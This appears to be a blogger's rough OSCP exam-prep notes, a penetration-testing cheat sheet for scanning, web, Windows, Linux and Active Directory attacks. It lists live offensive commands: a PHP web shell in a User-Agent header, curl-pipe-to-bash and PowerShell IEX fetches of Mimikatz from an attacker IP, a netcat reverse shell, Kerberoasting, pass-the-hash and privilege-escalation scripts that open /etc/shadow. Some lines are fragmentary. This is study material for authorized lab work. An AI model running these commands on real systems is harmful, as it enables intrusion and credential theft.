Offensive Security Rants & Threat Actor Roleplay
21 April 2022
I passed my OSCP in 2022 and wanted to contribute to the many helpful posts providing tips, tricks, and resources. I would also recommend referencing my GitBook for additional tooling and methodology.
Please keep in mind while reading this post that these are pretty much a direct copy of my rough notes.. As a result, there may be some unfinished thoughts, commands, and checklists contained within. Simple checklists help me not overthink - which coincidentally is my piece of advice for anyone attempting the OSCP.
Make sure while studying for the OSCP that you take lots of breaks, enjoy some coffee, and spend time with your friends and family. It’s no secret that the OSCP is tough, but struggling to exploit a machine or pass the first time doesn’t mean you’re any less of a hacker than the rest of us.
These are articles that Offensive Security has created and will answer several questions you may have about the exam. For example, what tooling is allowed and what the exam structure will look like.
Resources from the community that I found helpful while preparing for my exam.
Resources that I recommend checking out while preparing for the OSCP. For my preparation, I completed every Proving Ground Practice machine and several NetSecFocus HackTheBox recommendations. Additionally, I found S1REN’s walkthroughs incredibly helpful, they provide a great view of how you should be tackling machines.
This is my generic checklist and a baseline for every single box:
nmap -sV -sC -p- --min-rate=1000 -iL [scope] -oA Full-TCP-Scan
nmap -sUC --top-ports 1000 --min-rate=1000 -iL [scope] -oA Top-1000-UDP-Scan
nikto $ip
nslookup $ip
dig axfr $ip
Simple notes for Active Directory during the OSCP:
# Enumerate all local users
net user
# Enumerate all users in the domain
net user /domain
# Enumerate a specified user
net user $username /domain
1. Gain access to a domain user account.
2. Enumerate the domain with the commands listed above.
3. Enumerate all computers on the domain. Don't just enumerate one computer.. Enumerate them all.
4. Enumerate all users logged onto computers that we have local administrator access to.
5. Kerberoast with any user account acquired (GetUserSPNs, Invoke-Kerberoast, etc)
6. Attempt credential-based attacks against all discovered user accounts.
7. Pass the Hash to pivot (Also try to Pass the Ticket if applicable).
8. Run Mimikatz on all systems (Can also run LSASSY with CrackMapExec).
9. Enumerate password hashes and tickets: `sekurlsa::logonpasswords` and `sekurlsa::tickets`.
This checklist serves as a very basic web server checklist:
robots.txt
to enumerate any additional information about the site.-x php,html,sh
)admin:admin
or credentials identified via Google for the application.sslscan $ip
This checklist serves as a very basic Windows checklist:
- Run SMBMap against any identified SMB services: smbmap -H $ip
- Access SMB shares manually with smbclient: `smbclient \\$ip\$share
- Revisit all services with any identified credentials such as SSH, SMB, FTP, HTTP.
- Get the naming context of LDAP: ldapsearch -h $ip -x -s base namingcontexts
- After identifying the naming context, enumerate more: `ldapsearch -h $ip -x -b "DC=htb,DC=local"
- Enumerate RPC with rpcclient: `rpcclient -U '' $ip
- Some interesting flags for rpcclient are: `enumdomusers`, `queryuser parzival`, `querydomgroups`, and `querydispinfo`
- Enumerate LDAP without credentials:
ldapsearch -x -h $ip -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TDL>"
davtest -auth $user:[PASSWORD] -sendbd auto -url http://$ip
This checklist serves as a reminder for what I needed to install prior to taking my OSCP exam, you don’t want to spend the first few hours of your exam setting up an environment:
searchsploit -u
# Full-TCP-Scan
nmap -sV -sC -p- --min-rate 1000 -T4 $ip -oA Full-TCP-Scan
# Top-UDP-Scan
nmap -sU --top-ports 1000 -T4 $ip -oA Quick-UDP-Scan
# Vulnerability Scan
nmap -p $discoveredports --script=vuln $ip -oA Vuln-Scan
nmap -sC
should successfully enumerate users, it is always good to double check:ident-user-enum $ip 22 53 113
User-Agent: Googlebot/2.1 (+http://www.googlebot.com/bot.html)
http://:8080/?url=http://127.0.0.1:8080/?url=http://<RESPONDER_IP>
/var/www/html/webdav/passwd.dav
.sh
. This directory exists when Apache gives a file over to bash or another scripting language.parzival
try and login with the password
parzival
admin:admin
VRFY
to enumerate a valid email prior to execution.User-Agent: <?php system(\$_GET['c']); ?>
searchsploit postfix
id_rsa
file for any users that have been enumerated.uname -a
/etc/shadow
curl 10.10.10.1:8080/linpeas.sh | bash
which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null
mysql -u root -p
docker images
and docker run -v /:/mnt --rm -it [IMAGE] chroot /mnt sh
export
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
Invoke-Watson
and Invoke-MS16032
as examples. Their Mimikatz.ps1
is also great. These can be accessed at the following
location Kali: /usr/share/powershell-empire/empire/server/data/module_source/
reg query HKCU /f password /t REG_SZ /s
reg
query HKCU /f pass /t REG_SZ /s
/usr/share/windows-binaries
set PATH=%SystemRoot%\system32;%SystemRoot%;
powershell IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.10.1:8080/Invoke-Mimikatz.ps1') ; Invoke-Mimikatz -DumpCreds
powershell IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.119.164:8080/Invoke-Mimikatz.ps1') ; Invoke-Mimikatz -Command lsadump::sam
C:\Program Files (x86)
for any outdated and vulnerable installations.runas
command in combination with a binary like netcat: runas /env
/profile /user:[DOMAIN]\Administrator "C:\Windows\Tasks\nc.exe -e cmd.exe $attackerip 443"
Some additional resources I referenced throughout Windows privilege escalation
We can privesc in multiple ways from running this script. For example, we can add a root user to the /etc/passwd file or we can run /bin/bash -p
to obtain a shell with root privileges.
import os
def stop(text,value):
os.system("chmod 777 /etc/passwd");
def reset(text,value):
os.system("chmod +s /bin/bash");
def start(text,value):
os.system("chmod 777 /etc/shadow");
GetUserSPNs.py -request 'DOMAIN/MACHINE$' -dc-ip $dcip -hashes 'LM:NTLM'
net user
net user /domain
net user $user /domain
net group /domain
net accounts
klist
to see if there are any tickets stored in memory. This can also be performed with Mimikatz by running: kerberos::list /export
tgsrepcrack.py
or your favorite password cracking tool.Get-NetLoggedOn -ComputerName [COMPUTER]
Get-NetSession -ComputerName [DC]
Get-NetUser -SPN | select serviceprincipalname
Perform Kerberoasting with PowerView.Invoke-Kerberoast](https://www.pentestpartners.com/security-blog/how-to-kerberoast-like-a-boss/)Invoke-Kerberoast -OutputFormat HashCat | Select-Object -ExpandProperty hash |
- curl: `curl http://$attackerip/winpeas.exe -o winpeas.exe`
- wget: `wget http://$attackerip/winpeas.exe -O winpeas.exe`
1. `impacket-smbserver parzival [TARGET_DIRECTORY]`
2. Validate the share is accessible: `net view $attackerip`
3. Copy the file to a local directory: `copy \\$attackerip\parzival\winpeas.exe`
4. Alternatively, run the file directly from the SMB share: `\\$attackerip \parzival\winpeas.exe`
(New-Object System.Net.WebClient).DownloadFile("http://$attackerip/winpeas.exe", "C:\Windows\Temp\winpeas.exe")Invoke-WebRequest "http://$attackerip/winpeas.exe" -OutFile
"C:\Windows\Temp\winpeas.exe"powershell.exe -c "iwr http://$attackerip/winpeas.exe -OutFile C:\Windows\Temp\winpeas.exe
While the Buffer Overflow has since been removed from the exam environment, it still provides a great introduction to low-level exploit development. After obtaining your shiny new certification, I would still recommend checking out publcily available resources.
NULL (\0)
Tab (\t)
Line Feed (\n)
Carriage Return (\r)
Form Feed (\f)Common Bad Characters